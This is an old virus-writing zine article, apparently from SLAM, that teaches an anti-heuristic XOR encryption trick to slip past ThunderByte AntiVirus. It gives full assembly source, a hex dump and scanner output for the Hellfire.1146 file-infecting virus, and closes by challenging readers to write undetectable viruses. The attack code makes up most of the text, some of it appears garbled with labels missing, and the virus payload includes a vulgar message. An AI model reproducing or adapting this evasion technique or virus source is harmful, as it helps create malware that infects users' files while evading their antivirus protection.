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SLAM2.016: Generic Anti-Heuristic Encryption Technique for TBAV v7.07

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Published in 
 · 23 Feb 2022

Generic Anti-Heuristic Encryption Technique for TBAV v7.07
Method, Article and Demonstration Virus by Gothmog/DHA

As virus scanners become increasingly more complicated, viruses must as well; the days when adding a few NOPs or switching a couple instructions around was all you needed to do to create an unscannable masterpiece are gone forever.
Now, with ThunderByte AntiVirus's new and improved heuristic engine, the days of signature-based heuristics are over as well--the new engine bases its flagging on the function of a program instead of on its syntax; for example, it no longer looks for a "mov ah, 40h" followed soon by an "int 21h", but rather for an "int 21h" that has a value of ah=40h upon execution. In short, many anti-heuristic tricks that worked wonders only several versions of TBAV ago are obsolete.

One aspect of ThunderByte's scanning has remained constant, however, and that is its encryption algorithm detection. Instead of using lengthy bypasses to remove all your virus's heuristic flags, you only need create an encryption routine that is not detected by TBAV's algorithmic scanning--a far simpler task.

In the past, this common scheme could be used to overcome TBAV's heuristics; it relied upon the fact that the false jump confused the encryption routine detector, and was on the whole quite successful and effective:

; =========================================================================== 
; Encryption/Decryption code taken from Ahav.383
; ===========================================================================

key dw 0000

mov dx, word ptr [bp+offset key] ; bp holds virus offset

; in ahav, dx was set to a random word on entering the routine, therefore two
; entry points were used... other routines can and will vary. be creative....

lea si, [offset start_encrypt+bp]
jmp false_jump

xor ax,dx
loop xor_loop

mov cx, (end_encrypt - start_encrypt + 1) / 2
mov di, si
jmp xor_loop

; ============================================================[ code ends ]==

Unfortunately, such an approach no longer works with ThunderByte; the virus is decrypted, and gets the # flag as well as any applicable flags that the encrypted portion triggers:

  • C:\VIRUS\DHA\AHAV-383.COM infected by Ahav.336-383 virus
  • c No checksum / recovery information (Anti-Vir.Dat) available.
  • F Suspicious file access. Might be able to infect a file.
  • S Contains a routine to search for executable (.COM or .EXE) files.
  • # Found a code decryption routine or debugger trap. This is common for viruses but also for some copy-protected software.
  • O Found code that can be used to overwrite/move a program in memory.
  • B Back to entry point. Contains code to re-start the program after modifications at the entry-point are made. Very usual for viruses.

Clearly, some new encryption routine is needed... And _that_ is what this article is about.

I was fooling around with my encryption code the other day, testing ideas for simple, anti-heuristic xor encryption schemes, and I came up with the method that this article is concerned with. It is based upon the same idea as Ahav's xor loop--that is, to conceal the function of the loop by disguising it as some other innocuous control structure. Without further ado, here is the code; it should be pretty much self-explanatory:

; =========================================================================== 
; Generic Anti-Heuristic Encryption/Decryption Code for TBAV v7.07
; ===========================================================================

mov si, offset start_encrypt
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2

jmp false_jump

loop xor_loop

db 35h ; db for xor ax, word value

key dw 0000

jnc false_jump_2 ; <------ this statement fools tbav's heuristics

; continue your code as necessary here; tbav will not locate any decryption
; loop, and any suspicious code inside the encrypted region will not trigger
; any flags... see below for a demonstration virus which uses this technique,
; and passes all heuristics without a hitch.

; ============================================================[ code ends ]==

The essence of this technique is the jnc instruction; since there is no good reason why the carry flag should be set when that instruction is executed, control will always flow to false_jump_2 and thus into the remainder of the decryption code. Thunderbyte, however, sees this as a complex control structure and _NOT_ as a decryption loop, and will not even consider any code inside the encryption area in its further testing.

To demonstrate this, I cooked up a quickie overwrite, just to show how silly TBAV's algorithm is. The Hellfire.1146 virus decrypts itself, searches for a com file, checks for prior infection, hooks int 24 while infecting, preserves file attributes, size, and file date/time, and displays a fake "Bad command or file name" message. When all the files in the current directory are infected, it will display an ansi screen and lock in an infinite loop.

Nothing spectacular, but it demonstrates this anti-heuristic method's true effectiveness...

; =========================================================================== 
; Hellfire.1146 Anti-Heuristic Demonstration Virus Written by Gothmog/DHA
; ===========================================================================
; Assumes TASM v4.00 or v5.00 or A86 Macro Assembler v4.02; other assemblers
; may work, but are not personally tested or quality assured.
; Assemble with: tasm /m2 hell1146.asm (/m1 creates an 1148 byte variant)
; tlink /t hell1146.obj
; Alternately: a86 hell1146.asm (makes an 1157 byte variant)

.model tiny

org 100h

call decrypt

mov ah, 4Eh

mov cx, 07h
mov dx, offset com_mask
int 21h
jc writemessage

mov dx, 9Eh
mov ax, 3D00h
int 21h
xchg ax, bx

mov ah, 3Fh
mov cx, 01h
mov dx, offset bugger
int 21h

mov ah, 3Eh
int 21h

mov ah, 4Fh

cmp byte ptr[bugger], 0E8h
je findfile

cmp word ptr cs:[9Ah], offset endvirus-offset startvirus
jl findfile

mov ax, 2524h
mov dx, offset [Int24Handler+bp]
int 21h

mov ax, 4300h
mov dx, 9Eh
int 21h

push cx

mov ax, 4301h
xor cx, cx
int 21h

mov ax, 3D02h
int 21h
xchg ax, bx

mov ah, 2Ch
int 21h
mov key, dx

mov ah, 40h
push ax

mov cx, offset endvirus - offset startvirus
push cx

mov dx, offset startvirus

jmp writefile

mov ax, 4301h
mov dx, 9Eh
pop cx
int 21h

mov ax, 5701h
mov cx, word ptr cs:[096h]
mov dx, word ptr cs:[098h]
int 21h

mov ah, 09h
mov dx, offset fakeerror
int 21h

int 20h

mov ah, 0Fh
int 10h

xor ah, ah
int 10h

mov ah, 01h
mov cx, 2607h
int 10h

mov ax, 0B800h
mov es, ax
mov cx, 815
mov si, offset msghellfire
xor di, di

xor dx, dx
xor ax, ax

cmp al, 32
jc foreground

loop loop_a
jmp done

cmp al, 16
jnc background
and ah, 0F0h
or ah, al
jmp next

cmp al, 24
jz next_line
jnc flash_bit_toggle
sub al, 16
add al, al
add al, al
add al, al
add al, al
and ah, 8Fh
or ah, al
jmp next

add dx, 160
mov di, dx
jmp next

cmp al, 27
jc multi_output
jnz next
xor ah, 128
jmp next

cmp al, 25
mov bx, cx
mov cl, al
mov al, 32
jz start_output
dec bx

xor ch, ch
inc cx
rep stosw
mov cx, bx
dec cx
loopnz loop_a

jmp done

mov al, 03h

com_mask db '*.com', 0
fakeerror db 'Bad command or file name', 0Dh, 0Ah, '$'
msghellfire db 8,16,26,'O∞',24,26,'O∞',24,26,'O∞',24,26,11,'∞',15,20
db '⁄',26,'3ƒø',8,16,26,13,'∞',24,26,11,'∞',15,20,'≥ ',12
db 26,6,'/ ',14,'uh oh, you',39,'ve been infected with'
db ' a virus ',15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞'
db 15,20,'≥ ',12,'//',25,3,'O',25,2,15,27,'“ ¬ “ƒƒø “'
db 25,3,'“',25,3,'“ƒƒø ƒ“ƒ “ƒƒø “ƒƒø ',27,'≥',7,16,'±±'
db 8,26,11,'∞',24,26,11,'∞',15,20,'≥ ',12,'//',25,5,'> '
db ' ',15,27,'«ƒƒ¥ «ƒ',25,2,'∫',25,3,'∫',25,3,'«ƒ',25,3,'∫'
db ' «ƒ¬Ÿ «ƒ',25,3,27,'≥',7,16,'±±',8,26,11,'∞',24,26,11
db '∞',15,20,'≥ ',12,'/ \__ ~',25,2,15,27,'– ¡ –ƒƒŸ –'
db 'ƒƒŸ –ƒƒŸ –',25,3,'ƒ–ƒ – ¡ –ƒƒŸ ',27,'≥',7,16,'±±',8
db 26,11,'∞',24,26,11,'∞',15,20,'≥',25,3,12,'||',25,26,26
db 4,'/',25,13,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞'
db 15,20,'≥ ',12,'(\ \)',25,2,'(~)',25,19,'// o',25,13
db 15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥ '
db 12,'( \ \ / /',25,19,'//',25,3,'>',25,12,15,'≥',7,16
db '±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥ ',12,'( \ \'
db '/ /',25,8,26,11,'_/ \__O',25,13,15,'≥',7,16,'±±',8,26
db 11,'∞',24,26,11,'∞',15,20,'≥ ',12,'(',25,2,'\__/',25
db 8,'/ ___ ',26,5,'_\//',25,16,15,'≥',7,16,'±±',8,26,11
db '∞',24,26,11,'∞',15,20,'≥ ',12,'/',25,2,'| /@',25,7,'('
db ' / / ',26,5,'_)/',25,17,15,'≥',7,16,'±±',8,26,11,'∞'
db 24,26,11,'∞',15,20,'≥ ',12,'(',25,3,'|//',25,9,'\ \ '
db '/ /',25,2,'(_)',25,19,15,'≥',7,16,'±±',8,26,11,'∞',24
db 26,11,'∞',15,20,'≥ ',12,'\',25,2,'()',25,11,'\ \O/',25
db 26,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15,20,'≥'
db 25,2,12,'\ |',25,13,') )',25,27,15,'≥',7,16,'±±',8,26
db 11,'∞',24,26,11,'∞',15,20,'≥',25,3,12,') )',25,12,'/'
db ' /',25,28,15,'≥',7,16,'±±',8,26,11,'∞',24,26,11,'∞',15
db 20,'≥',25,2,12,'( |_',25,10,'/ /_ ',10,'so, do you'
db ' like taking it ',15,'≥',7,16,'±±',8,26,11,'∞',24,26
db 11,'∞',15,20,'≥',25,2,12,'(',26,3,'_>',25,8,'(',26,3,'_'
db '>',25,7,10,'up the ass?',25,8,15,'≥',7,16,'±±',8,26,11
db '∞',24,26,11,'∞',15,20,'¿',26,'3ƒŸ',7,16,'±±',8,26,11
db '∞',24,26,13,'∞',7,26,'5±',8,26,11,'∞',24,26,'O∞',24,26
db 'O∞',24,26,'O∞',24

end_encrypt equ $ - 1

call encrypt
pop cx
pop ax
int 21h
call decrypt
jmp writefakeerror

mov si, offset start_encrypt
mov di, si
mov cx, (end_encrypt - start_encrypt + 1) / 2

jmp hahahahaha

loop xorLoop

db 35h

key dw 0000

jnc oioioioioi


bugger db ?
f_attr db 09h dup (?)

end startvirus

; ============================================================[ code ends ]==

For those of you reading without a working assembler (there might be one or two, you never know...), here is a uuencoded first-generation copy of the virus, simply run UUDECODE or its equivalent on the article, or cut and paste the encoded section into a text file and decode it:

section 1/1 file [ Wincode 2.7.3 ] 

begin 644
sum -r/size 11861/1146

section 1/1 file [ Wincode 2.7.3 ]

All right... First off, let's examine a hex dump of the virus and see what we come up with:

0CB8:0100  E8 63 04 B4 4E B9 07 00-BA 09 02 CD 21 72 7E BA   .c..N.......!r~. 
0CB8:0110 9E 00 B8 00 3D CD 21 93-B4 3F B9 01 00 BA 7A 05 ....=.!..?....z.
0CB8:0120 CD 21 B4 3E CD 21 B4 4F-80 3E 7A 05 E8 74 D6 2E .!.>.!.O.>z..t..
0CB8:0130 81 3E 9A 00 7A 04 7C CD-B8 24 25 8B 96 06 02 CD .>..z.|..$%.....
0CB8:0140 21 B8 00 43 BA 9E 00 CD-21 51 B8 01 43 33 C9 CD !..C....!Q..C3..
0CB8:0150 21 B8 02 3D CD 21 93 B4-2C CD 21 89 16 76 05 B4 !..=.!..,.!..v..
0CB8:0160 40 50 B9 7A 04 51 BA 00-01 E9 ED 03 B8 01 43 BA @P.z.Q........C.
0CB8:0170 9E 00 59 CD 21 B8 01 57-2E 8B 0E 96 00 2E 8B 16 ..Y.!..W........
0CB8:0180 98 00 CD 21 B4 09 BA 0F-02 CD 21 CD 20 B4 0F CD ...!......!. ...
0CB8:0190 10 32 E4 CD 10 B4 01 B9-07 26 CD 10 B8 00 B8 8E .2.......&......
0CB8:01A0 C0 B9 2F 03 BE 2A 02 33-FF 33 D2 33 C0 FC AC 3C ../..*.3.3.3...<
0CB8:01B0 20 72 05 AB E2 F8 EB 4C-3C 10 73 07 80 E4 F0 0A r.....L<.s.....
0CB8:01C0 E0 EB F1 3C 18 74 13 73-19 2C 10 02 C0 02 C0 02 ...<.t.s.,......
0CB8:01D0 C0 02 C0 80 E4 8F 0A E0-EB DA 81 C2 A0 00 8B FA ................
0CB8:01E0 EB D2 3C 1B 72 07 75 CC-80 F4 80 EB C7 3C 19 8B ..<.r.u......<..
0CB8:01F0 D9 AC 8A C8 B0 20 74 02-AC 4B 32 ED 41 F3 AB 8B ..... t..K2.A...
0CB8:0200 CB 49 E0 AA EB FE B0 03-CF 2A 2E 63 6F 6D 00 42 .I.......*.com.B
0CB8:0210 61 64 20 63 6F 6D 6D 61-6E 64 20 6F 72 20 66 69 ad command or fi
0CB8:0220 6C 65 20 6E 61 6D 65 0D-0A 24 08 10 1A 4F B0 18 le name..$...O..
0CB8:0230 1A 4F B0 18 1A 4F B0 18-1A 0B B0 0F 14 DA 1A 33 .O...O.........3
0CB8:0240 C4 BF 08 10 1A 0D B0 18-1A 0B B0 0F 14 B3 20 20 ..............
0CB8:0250 0C 1A 06 2F 20 20 0E 75-68 20 6F 68 2C 20 79 6F .../ .uh oh, yo
0CB8:0260 75 27 76 65 20 62 65 65-6E 20 69 6E 66 65 63 74 u've been infect
0CB8:0270 65 64 20 77 69 74 68 20-61 20 76 69 72 75 73 20 ed with a virus
0CB8:0280 0F B3 07 10 B1 B1 08 1A-0B B0 18 1A 0B B0 0F 14 ................
0CB8:0290 B3 20 20 0C 2F 2F 19 03-4F 19 02 0F 1B D2 20 20 . .//..O.....
0CB8:02A0 C2 20 D2 C4 C4 BF 20 D2-19 03 D2 19 03 D2 C4 C4 . .... .........
0CB8:02B0 BF 20 C4 D2 C4 20 D2 C4-C4 BF 20 D2 C4 C4 BF 20 . ... .... ....
0CB8:02C0 20 1B B3 07 10 B1 B1 08-1A 0B B0 18 1A 0B B0 0F ...............
0CB8:02D0 14 B3 20 0C 2F 2F 19 05-3E 20 20 0F 1B C7 C4 C4 .. .//..> .....
0CB8:02E0 B4 20 C7 C4 19 02 BA 19-03 BA 19 03 C7 C4 19 03 . ..............
0CB8:02F0 BA 20 20 C7 C4 C2 D9 20-C7 C4 19 03 1B B3 07 10 . .... ........
0CB8:0300 B1 B1 08 1A 0B B0 18 1A-0B B0 0F 14 B3 20 20 0C ............. .
0CB8:0310 2F 20 5C 5F 5F 20 7E 19-02 0F 1B D0 20 20 C1 20 / \__ ~..... .
0CB8:0320 D0 C4 C4 D9 20 D0 C4 C4-D9 20 D0 C4 C4 D9 20 D0 .... .... .... .
0CB8:0330 19 03 C4 D0 C4 20 D0 20-C1 20 20 D0 C4 C4 D9 20 ..... . . ....
0CB8:0340 20 1B B3 07 10 B1 B1 08-1A 0B B0 18 1A 0B B0 0F ...............
0CB8:0350 14 B3 19 03 0C 7C 7C 19-1A 1A 04 2F 19 0D 0F B3 .....||..../....
0CB8:0360 07 10 B1 B1 08 1A 0B B0-18 1A 0B B0 0F 14 B3 20 ...............
0CB8:0370 20 0C 28 5C 20 5C 29 19-02 28 7E 29 19 13 2F 2F .(\ \)..(~)..//
0CB8:0380 20 20 6F 19 0D 0F B3 07-10 B1 B1 08 1A 0B B0 18 o.............
0CB8:0390 1A 0B B0 0F 14 B3 20 20-0C 28 20 5C 20 5C 20 20 ...... .( \ \
0CB8:03A0 2F 20 2F 19 13 2F 2F 19-03 3E 19 0C 0F B3 07 10 / /..//..>......
0CB8:03B0 B1 B1 08 1A 0B B0 18 1A-0B B0 0F 14 B3 20 20 0C ............. .
0CB8:03C0 28 20 20 5C 20 5C 2F 20-2F 19 08 1A 0B 5F 2F 20 ( \ \/ /...._/
0CB8:03D0 5C 5F 5F 4F 19 0D 0F B3-07 10 B1 B1 08 1A 0B B0 \__O............
0CB8:03E0 18 1A 0B B0 0F 14 B3 20-20 0C 28 19 02 5C 5F 5F ....... .(..\__
0CB8:03F0 2F 19 08 2F 20 20 5F 5F-5F 20 1A 05 5F 5C 2F 2F /../ ___ .._\//
0CB8:0400 19 10 0F B3 07 10 B1 B1-08 1A 0B B0 18 1A 0B B0 ................
0CB8:0410 0F 14 B3 20 20 0C 2F 19-02 7C 20 2F 40 19 07 28 ... ./..| /@..(
0CB8:0420 20 20 2F 20 20 2F 20 1A-05 5F 29 2F 19 11 0F B3 / / .._)/....
0CB8:0430 07 10 B1 B1 08 1A 0B B0-18 1A 0B B0 0F 14 B3 20 ...............
0CB8:0440 0C 28 19 03 7C 2F 2F 19-09 5C 20 5C 20 2F 20 2F .(..|//..\ \ / /
0CB8:0450 19 02 28 5F 29 19 13 0F-B3 07 10 B1 B1 08 1A 0B ..(_)...........
0CB8:0460 B0 18 1A 0B B0 0F 14 B3-20 20 0C 5C 19 02 28 29 ........ .\..()
0CB8:0470 19 0B 5C 20 5C 4F 2F 19-1A 0F B3 07 10 B1 B1 08 ..\ \O/.........
0CB8:0480 1A 0B B0 18 1A 0B B0 0F-14 B3 19 02 0C 5C 20 20 .............\
0CB8:0490 7C 19 0D 29 20 29 19 1B-0F B3 07 10 B1 B1 08 1A |..) )..........
0CB8:04A0 0B B0 18 1A 0B B0 0F 14-B3 19 03 0C 29 20 29 19 ............) ).
0CB8:04B0 0C 2F 20 2F 19 1C 0F B3-07 10 B1 B1 08 1A 0B B0 ./ /............
0CB8:04C0 18 1A 0B B0 0F 14 B3 19-02 0C 28 20 20 7C 5F 19 ..........( |_.
0CB8:04D0 0A 2F 20 2F 5F 20 20 0A-73 6F 2C 20 64 6F 20 79 ./ /_ .so, do y
0CB8:04E0 6F 75 20 6C 69 6B 65 20-74 61 6B 69 6E 67 20 69 ou like taking i
0CB8:04F0 74 20 20 0F B3 07 10 B1-B1 08 1A 0B B0 18 1A 0B t .............
0CB8:0500 B0 0F 14 B3 19 02 0C 28-1A 03 5F 3E 19 08 28 1A .......(.._>..(.
0CB8:0510 03 5F 3E 19 07 0A 75 70-20 74 68 65 20 61 73 73 ._>...up the ass
0CB8:0520 3F 19 08 0F B3 07 10 B1-B1 08 1A 0B B0 18 1A 0B ?...............
0CB8:0530 B0 0F 14 C0 1A 33 C4 D9-07 10 B1 B1 08 1A 0B B0 .....3..........
0CB8:0540 18 1A 0D B0 07 1A 35 B1-08 1A 0B B0 18 1A 4F B0 ......5.......O.
0CB8:0550 18 1A 4F B0 18 1A 4F B0-18 E8 0A 00 59 58 CD 21 ..O...O.....YX.!
0CB8:0560 E8 03 00 E9 06 FC BE 03-01 8B FE B9 2B 02 AD EB ............+...
0CB8:0570 04 AB E2 FA C3 35 00 00-73 F7 .....5..s.

Looking at the dump of the virus, we see there's a *.com in plain sight at memory location $0209, but does Thunderbyte pick this up?

  Thunderbyte virus detector v7.07 - (C) Copyright 1989-1997 Thunderbyte B.V. 

HELL1146.COM c ˚

Hehehe... Evidently not. You see, this simple scheme can make your virus totally hidden from Thunderbyte, even in its first-generation stage. A victim's hard drive could have every com file infected, and TBAV wouldn't say a thing...

You can clearly see the possibilities inherent in this encryption method. So, for now, I leave you with this issue's virus challenge. Use this technique in a new virus, or modify an old virus's encryption, but in any case, create a bugger that is invisible to Thunderbyte. Submit all your creations to the magazine and we'll have publish them in the next issue.

NOTE: In the VIRUSES.ZIP contained with this issue, there are about 25 other variants of the HellFire virus; most of these are earlier versions, and as such, you can scan them to see what gets caught, then compare what was changed between it and the release version in this file.

ALSO NOTE: If you liked this article, you'll love the Airwalker virus, which is contained within this issue. It adds advanced anti-heuristic techniques which hide your virus from all the major anti-virus software out there today.

Till next time...


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